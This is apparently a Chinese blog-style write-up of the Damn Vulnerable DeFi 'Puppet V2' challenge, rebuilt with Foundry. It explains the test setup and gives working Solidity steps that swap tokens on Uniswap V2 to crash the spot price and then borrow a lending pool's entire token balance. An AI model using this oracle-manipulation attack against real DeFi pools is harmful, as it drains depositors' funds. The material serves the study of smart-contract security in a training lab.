Challenge #9 - Puppet V2

为了系统的学习solidity和foundry，我基于foundry测试框架重新编写damnvulnerable-defi的题解，欢迎交流和共建～🎉

https://github.com/zach030/damnvulnerabledefi-foundry

合约

• PuppetV2Pool: 提供borrow方法，用weth换出token，token价格来自于uniswap的报价
• Uniswap-v2相关合约

测试

• 部署weth和token合约
• 部署uniswap factory、router、pair合约
• 通过与router合约交互注入流动性，token数目：UNISWAP_INITIAL_TOKEN_RESERVE，eth数目：UNISWAP_INITIAL_WETH_RESERVE
• 部署puppetV2Pool合约，向player和pool中分别转入PLAYER_INITIAL_TOKEN_BALANCE和POOL_INITIAL_TOKEN_BALANCE数目的token
• 执行测试脚本
• 期望pool中的token余额为0，player的token余额大于POOL_INITIAL_TOKEN_BALANCE

题解

这道题的攻击思路和Puppet- v1的思路类似，仍然是利用uniswap价格预言机对pool进行攻击，

值得注意的是这里使用的都是uniswap-v2，在v2中使用的是token和weth的代币对，但是player用户开始只有eth，需要与weth合约进行交互

完整的攻击流程如下图所示：

• 第一步：通过调用swapExactTokensForTokens 将player账户中的全部token换成weth，从而降低token在uniswap中的单价
• 第二步：计算借出池子中的全部token需要花费多少weth，在经过第一步后已经拿到一部分weth，再通过质押eth补齐剩余的weth
• 第三步：调用池子的borrow 方法，将pool中的全部token借出
• 第四步：（本题未做要求，可以将weth放入池子中，补足池子中的差价）

完整的步骤代码示例如下：

token.approve(address(uniswapV2Router), PLAYER_INITIAL_TOKEN_BALANCE);
address[] memory path = new address[](2);
path[0] = address(token);
path[1] = address(weth);
// swap token to weth
uniswapV2Router.swapExactTokensForTokens(
    PLAYER_INITIAL_TOKEN_BALANCE, // amount in
    1,                            // amount out min
    path,                         // path
    address(player),              // to
    block.timestamp*2             // deadline
);
uint256 value = pool.calculateDepositOfWETHRequired(POOL_INITIAL_TOKEN_BALANCE);
uint256 depositValue = value - weth.balanceOf(address(player));
weth.deposit{value: depositValue}();
weth.approve(address(pool), value);
pool.borrow(POOL_INITIAL_TOKEN_BALANCE);